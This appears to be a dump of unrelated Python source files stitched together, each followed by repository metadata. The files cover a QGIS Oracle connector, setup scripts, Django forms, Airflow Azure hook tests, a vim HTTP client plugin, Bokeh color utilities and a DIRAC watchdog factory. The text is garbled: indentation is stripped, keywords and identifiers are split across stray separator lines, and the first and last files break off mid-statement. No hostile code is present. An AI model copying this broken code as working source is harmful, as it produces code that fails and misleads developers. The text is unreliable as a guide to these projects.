settings.value("allowGeometrylessTables", False, type=bool)))
uri.setParam('onlyExistingTypes', unicode(
settings.value("onlyExistingTypes", False, type=bool)))
settings.endGroup()
uri.setConnection(host, port, database, username, password)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
err = u""
try:
return self.connectToUri(uri)
except ConnectionError as e:
err = unicode(e)
# ask for valid credentials
max_attempts = 3
for i in range(max_attempts):
(ok, username, password) = QgsCredentials.instance().get(
uri.connectionInfo(False), username, password, err)
if not ok:
return False
uri.setConnection(host, port, database, username, password)
try:
self.connectToUri(uri)
except ConnectionError as e:
if i == max_attempts - 1: # failed the last attempt
raise e
err = unicode(e)
continue
QgsCredentials.instance().put(
uri.connectionInfo(False), username, password)
return True
return False
class ORDatabase(Database):
def __init__(self, connection, uri):
self.connName = connection.connectionName()
Database.__init__(self, connection, uri)
def connectorsFactory(self, uri):
return OracleDBConnector(uri, self.connName)
def dataTablesFactory(self, row, db, schema=None):
return ORTable(row, db, schema)
def vectorTablesFactory(self, row, db, schema=None):
return ORVectorTable(row, db, schema)
def info(self):
from .info_model import ORDatabaseInfo
return ORDatabaseInfo(self)
def schemasFactory(self, row, db):
return ORSchema(row, db)
def columnUniqueValuesModel(self, col, table, limit=10):
l = u""
if limit:
l = u"WHERE ROWNUM < {:d}".format(limit)
con = self.database().connector
# Prevent geometry column show
tableName = table.replace(u'"', u"").split(u".")
if len(tableName) == 0:
tableName = [None, tableName[0]]
colName = col.replace(u'"', u"").split(u".")[-1]
if con.isGeometryColumn(tableName, colName):
return None
query = u"SELECT DISTINCT {} FROM {} {}".format(col, table, l)
return self.sqlResultModel(query, self)
def sqlResultModel(self, sql, parent):
from .data_model import ORSqlResultModel
return ORSqlResultModel(self, sql, parent)
def toSqlLayer(self, sql, geomCol, uniqueCol,
layerName=u"QueryLayer", layerType=None,
avoidSelectById=False, filter=""):
from qgis.core import QgsMapLayer, QgsVectorLayer
uri = self.uri()
con = self.database().connector
uri.setDataSource(u"", u"({})".format(sql), geomCol, filter, uniqueCol.strip(u'"'))
if avoidSelectById:
uri.disableSelectAtId(True)
provider = self.dbplugin().providerName()
vlayer = QgsVectorLayer(uri.uri(False), layerName, provider)
# handling undetermined geometry type
if not vlayer.isValid():
wkbType, srid = con.getTableMainGeomType(
u"({})".format(sql), geomCol)
uri.setWkbType(wkbType)
if srid:
uri.setSrid(unicode(srid))
vlayer = QgsVectorLayer(uri.uri(False), layerName, provider)
return vlayer
def registerDatabaseActions(self, mainWindow):
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Re-connect"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Database"), self.reconnectActionSlot)
|
if self.schemas():
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Create schema"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Schema"), self.createSchemaActionSlot)
|
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Delete (empty) schema"), self)
mainWindow.registerAction(action, Q
|
stuaxo/pyHotReload
|
setup.py
|
Python
|
bsd-2-clause
| 2,321
| 0.004308
|
import glob
import os
import shutil
from distutils import sysconfig
from setuptools import setup, Command
from setuptools.command.install import install
here=os.path.dirname(os.path.abspath(__file__))
site_packages_path = sysconfig.get_python_lib()
class CleanCommand(Command):
"""Custom clean command to tidy up the project root."""
CLEAN_FILES = './build ./dist ./*.pyc ./*.tgz ./*.egg-info'.split(' ')
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
d
|
ef run(self):
global here
for path_spec in self.CLEAN_FILES:
# Make paths absolute and relative to this path
abs_paths = glob.glob(os.path.normpath(os.path.join(here, path_spec)))
|
for path in [str(p) for p in abs_paths]:
if not path.startswith(here):
# Die if path in CLEAN_FILES is absolute + outside this directory
raise ValueError("%s is not a path inside %s" % (path, here))
print('removing %s' % os.path.relpath(path))
shutil.rmtree(path)
long_description="""
pyhotreload allows you to patch a system while it is running.
"""
setup(
name='pyhotreload',
version='0.0.1',
description='patch a system while its running',
long_description=long_description,
cmdclass={
'clean': CleanCommand,
},
url='https://github.com/mdsitton/pyHotReload/',
author='Matthew Sitton',
author_email='[email protected]',
license='',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
#'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
],
# What does your project relate to?
keywords='hot reload',
install_requires=[],
packages=['hotreload'],
)
|
rbuffat/pyidf
|
tests/test_compliancebuilding.py
|
Python
|
apache-2.0
| 1,041
| 0.003842
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.compliance_objects import ComplianceBuilding
log = logging.getLogger(__name__)
class TestComplianceBuilding(unittest.TestCase):
def setUp(self)
|
:
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_compliancebuilding(self):
pyidf.validation_level = ValidationLevel.error
obj = ComplianceBuilding()
# real
var_building_rotation_for_appendix_g = 1.1
obj.building_rotation_for_appendix_g = var_building_rotation_for_appendix_g
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with op
|
en(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertAlmostEqual(idf2.compliancebuildings[0].building_rotation_for_appendix_g, var_building_rotation_for_appendix_g)
|
scott48074/Restorative-Justice-App
|
app/csv_handler.py
|
Python
|
mit
| 1,556
| 0.003856
|
#!/usr/bin/env python3
"""
Open csv file with each a list. All the row-lists are contained in a list. In
preparation for entry into the database the data is cleaned. This includes
validating the headers and striping and lowering the values.
"""
import csv
HEADERS = ['case number', 'case occurred from date', 'case occurred incident type', 'case ori',
'case subject age', 'case subject custody status', 'case subject global subject',
'case subject global subject address', 'case subject global subject address apartment',
'case subject global subject address city', 'case subject global subject address state',
'case subject global subject address zip',
'case subject global subject date of birth',
'case subject global subject primary phone number',
'case subject global subject race', 'case subject global subject sex',
'case subject type
|
', 'reporting district']
def open_csv(path):
# Open the csv file lower and strip all the values. Make sure the csv is
# expect format.
with open(path) as csvfile:
reader = list(csv.reader(csvfile, delimiter=','))
rows = [[val.strip().lower() for val in row] for row in reader]
if rows.pop(0) != HEADERS:
|
return False
return rows
def write_receipt(path, rows):
# Write the receipt to csv file.
with open(f'{path}/receipt.csv', 'w') as f:
writer = csv.writer(f)
writer.writerows(rows)
def main():
pass
if __name__ == '__main__':
main()
|
RetroMelon/PatchWords
|
patchwords_project/patchwords/forms.py
|
Python
|
mit
| 1,944
| 0.013374
|
from django import forms
from registration.forms import RegistrationForm
from django.contrib.auth.models import User
from models import UserProfile
from models import *
class Registration(RegistrationForm):
picture = forms.ImageField(required=False)
bio = forms.CharField(widget=forms.Textarea(),required=False)
date_of_birth = forms.DateField(input_formats=['%d/%m/%Y'],required=False)
GENDER_CHOICES = (
("Male", "Male"),
("Female", "Female"),)
gender = forms.ChoiceField(widget=forms.RadioSelect,
choices=GENDER_CHOICES,required=False)
class UserForm(forms.ModelForm):
username = forms.CharField(required=False)
class Meta:
model = User
fields = ('username','email',)
class UserProfileForm(forms.ModelForm):
GENDER_CHOICES = (
("Male", "Male"),
("Fema
|
le", "Female"),)
gender = forms.ChoiceField(widget=forms.RadioSelect,
choices=GENDER_CHOICES,required=False)
class Meta:
model = UserProfile
fields = ('picture','bio','gender')
class ParagraphForm(forms.ModelFor
|
m):
content = forms.CharField(max_length=200, help_text="Write your paragraph!")
choices = (
(True, 'yes'),
(False, 'no'))
end = forms.ChoiceField(choices=choices, widget=forms.RadioSelect)
class Meta:
model = Paragraph
exclude = ('story', 'parent', 'author','created_datetime')
class StoryForm(forms.ModelForm):
title = forms.CharField(max_length=100, help_text='Title', required = True)
#category = forms.ModelChoiceField(queryset=Category.objects.all().order_by('title'), help_text = "Category", required = True)
cat = forms.CharField(required = True)
text = forms.CharField(max_length=140, help_text="First Paragraph", required = True)
class Meta:
model = Story
exclude = ('created_datetime', 'author', 'slug', 'category')
|
malmiron/incubator-airflow
|
tests/contrib/hooks/test_azure_data_lake_hook.py
|
Python
|
apache-2.0
| 5,649
| 0.00354
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
import unittest
from airflow import configuration
from airflow import models
from airflow.utils import db
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
class TestAzureDataLakeHook(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
db.merge_conn(
models.Connection(
conn_id='adl_test_key',
conn_type='azure_data_lake',
login='client_id',
password='client secret',
extra=json.dumps({"tenant": "tenant",
"account_name": "accountname"})
)
)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_conn(self, mock_lib):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
from azure.datalake.store import core
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
self.assertEqual(hook.conn_id, 'adl_test_key')
self.assertIsInstance(hook.connection, core.AzureDLFileSystem)
assert mock_lib.auth.called
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_check_for_blob(self, mock_lib, mock_filesystem):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.check_for_file('file_path')
mock_filesystem.glob.called
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.multithread.ADLUploader',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_upload_file(self, mock_lib, mock_uploader):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.upload_file(local_path='tests/hooks/test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
mock_uploader.assert_called_once_with(hook.connection,
lpath='tests/hooks/test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.multithread.ADLDownloader',
autospec=True)
|
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_download_file(self, mock_lib, mock_downloader):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.download_file(local_path='test_adl_hook.py',
remote_path='/test_adl_hook.py',
nthreads=64, overwrite=T
|
rue,
buffersize=4194304, blocksize=4194304)
mock_downloader.assert_called_once_with(hook.connection,
lpath='test_adl_hook.py',
rpath='/test_adl_hook.py',
nthreads=64, overwrite=True,
buffersize=4194304, blocksize=4194304)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_list_glob(self, mock_lib, mock_fs):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/*')
mock_fs.return_value.glob.assert_called_with('file_path/*')
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.core.AzureDLFileSystem',
autospec=True)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_list_walk(self, mock_lib, mock_fs):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
hook.list('file_path/some_folder/')
mock_fs.return_value.walk.assert_called_with('file_path/some_folder/')
if __name__ == '__main__':
unittest.main()
|
aquach/vim-http-client
|
plugin/http_client.py
|
Python
|
mit
| 8,172
| 0.005996
|
import json
import re
import requests
from_cmdline = False
try:
__file__
from_cmdline = True
except NameError:
pass
if not from_cmdline:
import vim
METHOD_REGEX = re.compile('^(GET|POST|DELETE|PUT|HEAD|OPTIONS|PATCH) (.*)$')
HEADER_REGEX = re.compile('^([^()<>@,;:\<>/\[\]?={}]+):\\s*(.*)$')
VAR_REGEX = re.compile('^# ?(:[^: ]+)\\s*=\\s*(.+)$')
GLOBAL_VAR_REGEX = re.compile('^# ?(\$[^$ ]+)\\s*=\\s*(.+)$')
FILE_REGEX = re.compile("!((?:file)|(?:(?:content)))\((.+)\)")
JSON_REGEX = re.compile("(javascript|json)$", re.IGNORECASE)
verify_ssl = vim.eval('g:http_client_verify_ssl') == '1'
def replace_vars(string, variables):
for var, val in variables.items():
string = string.replace(var, val)
return string
def is_comment(s):
return s.startswith('#')
def do_request(block, buf):
variables = dict((m.groups() for m in (GLOBAL_VAR_REGEX.match(l) for l in buf) if m))
variables.update(dict((m.groups() for m in (VAR_REGEX.match(l) for l in block) if m)))
block = [line for line in block if not is_comment(line) and line.strip() != '']
if len(block) == 0:
print('Request was empty.')
return
method_url = block.pop(0)
method_url_match = METHOD_REGEX.match(method_url)
if not method_url_match:
print('Could not find method or URL!')
return
method, url = method_url_match.groups()
url = replace_vars(url, variables)
url = url.strip()
headers = {}
while len(block) > 0:
header_match = HEADER_REGEX.match(block[0])
if header_match:
|
block.pop(0)
header_name, header_value = header_match.groups()
headers[header_name] = replace_vars(header_value, variables)
else:
break
data = [ replace_vars(l, variables) for l in block ]
files = None
if all([ '=' in l for l in data ]):
# Form data: separate entries into data dict, and files dict
key_value_pairs = dict([ l.split('=', 1) for l in data ])
|
def to_file(expr):
type, arg = FILE_REGEX.match(expr).groups()
arg = arg.replace('\\(', '(').replace('\\)', ')')
return open(arg, 'rb') if type == 'file' else (arg)
files = dict([(k, to_file(v)) for (k, v) in key_value_pairs.items() if FILE_REGEX.match(v)])
data = dict([(k, v) for (k, v) in key_value_pairs.items() if not FILE_REGEX.match(v)])
else:
# Straight data: just send it off as a string.
data = '\n'.join(data)
if not verify_ssl:
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
json_data = None
if headers.get('Content-Type') == 'application/json':
json_data = json.loads(data)
data = None
response = requests.request(method, url, verify=verify_ssl, headers=headers, data=data, files=files, json=json_data)
content_type = response.headers.get('Content-Type', '').split(';')[0]
response_body = response.text
if JSON_REGEX.search(content_type):
content_type = 'application/json'
try:
response_body = json.dumps(
json.loads(response.text), sort_keys=True, indent=2,
separators=(',', ': '),
ensure_ascii=vim.eval('g:http_client_json_escape_utf')=='1')
except ValueError:
pass
display = (
response_body.split('\n') +
['', '// status code: %s' % response.status_code] +
['// %s: %s' % (k, v) for k, v in response.headers.items()]
)
return display, content_type
# Vim methods.
def vim_filetypes_by_content_type():
return {
'application/json': vim.eval('g:http_client_json_ft'),
'application/xml': 'xml',
'text/html': 'html'
}
BUFFER_NAME = '__HTTP_Client_Response__'
def find_block(buf, line_num):
length = len(buf)
is_buffer_terminator = lambda s: s.strip() == ''
block_start = line_num
while block_start > 0 and not is_buffer_terminator(buf[block_start]):
block_start -= 1
block_end = line_num
while block_end < length and not is_buffer_terminator(buf[block_end]):
block_end += 1
return buf[block_start:block_end + 1]
def open_scratch_buffer(contents, filetype):
previous_window = vim.current.window
existing_buffer_window_id = vim.eval('bufwinnr("%s")' % BUFFER_NAME)
if existing_buffer_window_id == '-1':
if vim.eval('g:http_client_result_vsplit') == '1':
split_cmd = 'vsplit'
else:
split_cmd = 'split'
vim.command('rightbelow %s %s' % (split_cmd, BUFFER_NAME))
vim.command('setlocal buftype=nofile nospell')
else:
vim.command('%swincmd w' % existing_buffer_window_id)
vim.command('set filetype=%s' % filetype)
write_buffer(contents, vim.current.buffer)
if vim.eval('g:http_client_focus_output_window') != '1':
vim.current.window = previous_window
def do_request_from_buffer():
win = vim.current.window
line_num = win.cursor[0] - 1
block = find_block(win.buffer, line_num)
result = do_request(block, win.buffer)
if result:
response, content_type = result
vim_ft = vim_filetypes_by_content_type().get(content_type, 'text')
open_scratch_buffer(response, vim_ft)
def write_buffer(contents, buffer):
if vim.eval('g:http_client_preserve_responses') == '1':
if len(buffer):
buffer[0:0] = [""]
buffer[0:0] = contents
vim.command('0')
else:
buffer[:] = contents
# Tests.
def run_tests():
import json
def extract_json(resp):
return json.loads(''.join([ l for l in resp[0] if not l.startswith('//') ]))
def test(assertion, test):
print('Test %s: %s' % ('passed' if assertion else 'failed', test))
if not assertion:
raise AssertionError
resp = extract_json(do_request([
'# comment',
'# :a=barf',
'GET http://httpbin.org/headers',
'X-Hey: :a',
'# comment'
], []))
test(resp['headers']['X-Hey'] == 'barf', 'Headers are passed with variable substitution.')
resp = extract_json(do_request([
'# :a = barf',
'GET http://httpbin.org/get?data=:a'
], []))
test(resp['args']['data'] == 'barf', 'GET data is passed with variable substitution.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'some data'
], []))
test(resp['data'] == 'some data', 'POST data is passed with variable substitution.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
], []))
test(resp['form']['forma'] == 'a', 'POST form data is passed.')
resp = extract_json(do_request([
'POST http://$global/post',
'forma=a',
'formb=b',
], [ '# $global = httpbin.org']))
test(resp['form']['forma'] == 'a', 'Global variables are substituted.')
import os
from tempfile import NamedTemporaryFile
SAMPLE_FILE_CONTENT = 'sample file content'
temp_file = NamedTemporaryFile(delete = False)
temp_file.write(SAMPLE_FILE_CONTENT)
temp_file.close()
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
"formc=!file(%s)" % temp_file.name,
], []))
test(resp['files']['formc'] == SAMPLE_FILE_CONTENT, 'Files given as path are sent properly.')
test(not 'formc' in resp['form'], 'File not included in form data.')
os.unlink(temp_file.name)
resp = extract_json(do_request([
'POST http://httpbin.org/post',
'forma=a',
'formb=b',
"formc=!content(%s)" % SAMPLE_FILE_CONTENT,
], []))
test(resp['files']['formc'] == SAMPLE_FILE_CONTENT, 'Files given as content are sent properly.')
resp = extract_json(do_request([
'POST http://httpbin.org/post',
"c=!content(foo \\(bar\\))",
], []))
test(resp['files']['c'] == 'foo (bar)', 'Escaped parenthesis should be unescaped during request')
if from_cmdline:
run_tests()
|
rwl/PyCIM
|
CIM14/ENTSOE/Dynamics/IEC61970/Dynamics/ExcitationSystems/ExcitationSystemsExcAC3A.py
|
Python
|
mit
| 3,453
| 0.01448
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.ENTSOE.Dynamics.IEC61970.Core.CorePowerSystemResource import CorePowerSystemResource
class ExcitationSystemsExcAC3A(CorePowerSystemResource):
def __init__(self, ta=0.0, ka=0.0, kd=0.0, se1=0.0, kc=0.0, se2=0.0, te=0.0, tf=0.0, tb=0.0, tc=0.0, vamax=0.0, kf=0.0, vemin=0.0, ke=0.0, vfemax=0.0, tr=0.0, e2=0.0, e1=0.0, kn=0.0, vamin=0.0, kr=0.0, efdn=0.0, *args, **kw_args):
"""Initialises a new 'ExcitationSystemsExcAC3A' instance.
@param ta:
@param ka:
@param kd:
@param se1:
@param kc:
@param se2:
@param te:
@param tf:
@param tb:
@param tc:
@param vamax:
@param kf:
@param vemin:
@param ke:
@param vfemax:
@param tr:
@param e2:
@param e1:
@param kn:
@param vamin:
@param kr:
@param efdn:
"""
self.ta = ta
self.ka = ka
self.kd = kd
self.se1 = se1
sel
|
f.kc = kc
self.se2 = se2
self.te = te
self.tf = tf
self.tb = tb
self.tc = tc
|
self.vamax = vamax
self.kf = kf
self.vemin = vemin
self.ke = ke
self.vfemax = vfemax
self.tr = tr
self.e2 = e2
self.e1 = e1
self.kn = kn
self.vamin = vamin
self.kr = kr
self.efdn = efdn
super(ExcitationSystemsExcAC3A, self).__init__(*args, **kw_args)
_attrs = ["ta", "ka", "kd", "se1", "kc", "se2", "te", "tf", "tb", "tc", "vamax", "kf", "vemin", "ke", "vfemax", "tr", "e2", "e1", "kn", "vamin", "kr", "efdn"]
_attr_types = {"ta": float, "ka": float, "kd": float, "se1": float, "kc": float, "se2": float, "te": float, "tf": float, "tb": float, "tc": float, "vamax": float, "kf": float, "vemin": float, "ke": float, "vfemax": float, "tr": float, "e2": float, "e1": float, "kn": float, "vamin": float, "kr": float, "efdn": float}
_defaults = {"ta": 0.0, "ka": 0.0, "kd": 0.0, "se1": 0.0, "kc": 0.0, "se2": 0.0, "te": 0.0, "tf": 0.0, "tb": 0.0, "tc": 0.0, "vamax": 0.0, "kf": 0.0, "vemin": 0.0, "ke": 0.0, "vfemax": 0.0, "tr": 0.0, "e2": 0.0, "e1": 0.0, "kn": 0.0, "vamin": 0.0, "kr": 0.0, "efdn": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
philippjfr/bokeh
|
bokeh/colors/color.py
|
Python
|
bsd-3-clause
| 5,085
| 0.00885
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a base class for representing color values.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
from bokeh.util.api import public, internal ; public, internal
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Public API
#-----------------------------------------------------------------------------
@public((1,0,0))
class Color(object):
''' A base class for representing color objects.
'''
def __repr__(self):
return self.to_css()
@staticmethod
@public((1,0,0))
def clamp(value, maximum=None):
''' Clamp numeric values to be non-negative, an optionally, less than a
given maximum.
Args:
value (float) :
A number to clamp.
maxiumum (float, optional) :
A max bound to to clamp to. If None, there is no upper bound,
and values are only clamped to be non-negative. (default: None)
Returns:
float
'''
value = max(value, 0)
if maximum is not None:
return min(value, maximum)
else:
return value
@public((1,0,0))
def copy(self):
''' Copy this color.
*Subclasses must implement this method.*
'''
raise NotImplementedError
@public((1,0,0))
def darken(self, amount):
''' Darken (reduce the luminance) of this color.
Args:
amount (float) :
Amount to reduce the luminance by (clamped above zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l - amount)
return self.from_hsl(hsl)
@classmethod
@public((1,0,0))
def from_hsl(cls, value):
''' Create a new color by converting from an HSL color.
*Subclasses must implement this method.*
Args:
value (HSL) :
A color to convert from HSL
Returns:
Color
'''
raise NotImplementedError
@classmethod
@public((1,0,0))
def from_rgb(cls, value):
''' Create a new color by converting from an RGB color.
*Subclasses must implement this method.*
Args:
value (:class:`~bokeh.colors.rgb.RGB`) :
A color to convert from RGB
Returns:
Color
'''
raise NotImplementedError
@public((1,0,0))
def lighten(self, amount):
''' Lighten (increase the luminance) of this color.
Args:
amount (float) :
Amount to increase the luminance by (clamped above
|
zero)
Returns:
Color
'''
hsl = self.to_hsl()
hsl.l = self.clamp(hsl.l + amount, 1)
return self.from_hsl(hsl)
@public((1,0,0))
|
def to_css(self):
''' Return a CSS representation of this color.
*Subclasses must implement this method.*
Returns:
str
'''
raise NotImplementedError
@public((1,0,0))
def to_hsl(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
HSL
'''
raise NotImplementedError
@public((1,0,0))
def to_rgb(self):
''' Create a new HSL color by converting from this color.
*Subclasses must implement this method.*
Returns:
:class:`~bokeh.colors.rgb.RGB`
'''
raise NotImplementedError
#-----------------------------------------------------------------------------
# Internal API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
mialinx/testenv
|
testenv/contrib/memcached.py
|
Python
|
mit
| 510
| 0.005882
|
# -*- coding: utf-8 -*-
from .. import server, utils
class Memcached(server.Server):
binary = 'memcached'
def init(self, **kwargs):
self.binary = utils.find_binary(kwargs.get('memcached_bin', self.binary))
assert 'ip' in kwargs, "memcached servers requires <ip> option"
self.ip
|
= kwargs['ip']
assert 'port' in kwargs, "memcached server require <port> option"
self.port = kwargs['port']
self.command = [ self.binary, '-l', self.ip, '-p'
|
, self.port ]
|
andresailer/DIRAC
|
WorkloadManagementSystem/JobWrapper/WatchdogFactory.py
|
Python
|
gpl-3.0
| 2,478
| 0.033495
|
""" The Watchdog Factory instantiates a given Watchdog based on a quick
determination of the local operating system.
"""
__RCSID__ = "$Id$"
import re
import platform
from DIRAC import S_OK, S_ERROR, gLogger
class WatchdogFactory( object ):
#############################################################################
def __init__(self):
""" Standard constructor
"""
self.version = platform.uname()
self.log = gLogger.getSubLogger( 'WatchdogFactory' )
self.watchDogsLocation = 'DIRAC.WorkloadManagementSystem.JobWrapper'
#############################################################################
def getWatchdog( self, pid, exeThread, spObject, jobCPUTime, memoryLimit, processors = 1, jobArgs = {} ):
""" This method returns the CE instance corresponding to the local OS. The Linux watchdog is returned by default.
"""
if re.search( 'Darwin', self.version[0] ):
localOS = 'Mac'
self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
# elif re.search( 'Windows', self.version[0] ):
# localOS = 'Windows'
# self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
else:
localOS = 'Linux'
self.log.info( 'WatchdogFactory will create Watchdog%s instance' % ( localOS ) )
subClassName = "Watchdog%s" % ( localOS )
try:
wdModule = __import__( self.watchDogsLocation + '.%s' % subClassName, globals(), locals(), [subClassName] )
except ImportError as e:
self.log.exception( "Failed to import module" + self.watchDogsLocation + '.%s' % subClassName + '.%s' % subClassName + ': ' + str(e) )
return S_ERROR( "Failed to import module" )
try:
wd_o = getattr( wdModule, subClassName )( pid = pid,
exeThread = exeThread,
spObject = spObject,
jobCPUTime = jobCPUTime,
memoryLimit = me
|
moryLimit,
processors = processors,
jobArgs = jobArgs )
return S_OK( wd_o )
except AttributeError as e:
self.log.exception( "Failed to create %s(): %s." % ( subClassName, e ) )
return S_ERROR( "Failed to create ob
|
ject" )
#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
iw3hxn/LibrERP
|
mrp_bom_warning/__openerp__.py
|
Python
|
agpl-3.0
| 588
| 0.001704
|
# -*- coding: utf-8 -*-
# © 201
|
7 Didotech srl (www.didotech.com)
{
"name": "BoM Warning",
"version": "4.0.1.2",
"depends": [
"mrp",
"base",
"product",
"warning"
],
"author": "Didotech srl",
"description": """
This module is aim to track the warning on Bills of Mate
|
rial.
""",
"website": "https://www.didotech.com",
"category": "Manufacture Resource Planning",
"data": [
'views/product_view.xml',
'views/mrp_bom_view.xml'
],
"demo": [],
"active": False,
"installable": True,
}
|
nap-complex/pythonPractice
|
newFile.py
|
Python
|
gpl-3.0
| 143
| 0.006993
|
#!/us
|
r/bin/env python3
print("this is a test program to see if")
print("we can make a new
|
file in github")
print("and push it to the hub.")
|
cwilhelm/django-teams
|
setup.py
|
Python
|
bsd-3-clause
| 1,758
| 0.001706
|
from distutils.core import setup
import os
from teams import get_version
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('teams'):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
elif filenames:
prefix = dirpath[13:] # Strip "teams/" or "teams\"
for f in filenames:
data_files.append(os.path.join(prefix, f))
setup(name='django-teams',
version=get_version().replace(' ', '-'),
description='django-teams',
author='Charly Wilhelm',
author_email='[email protected]',
|
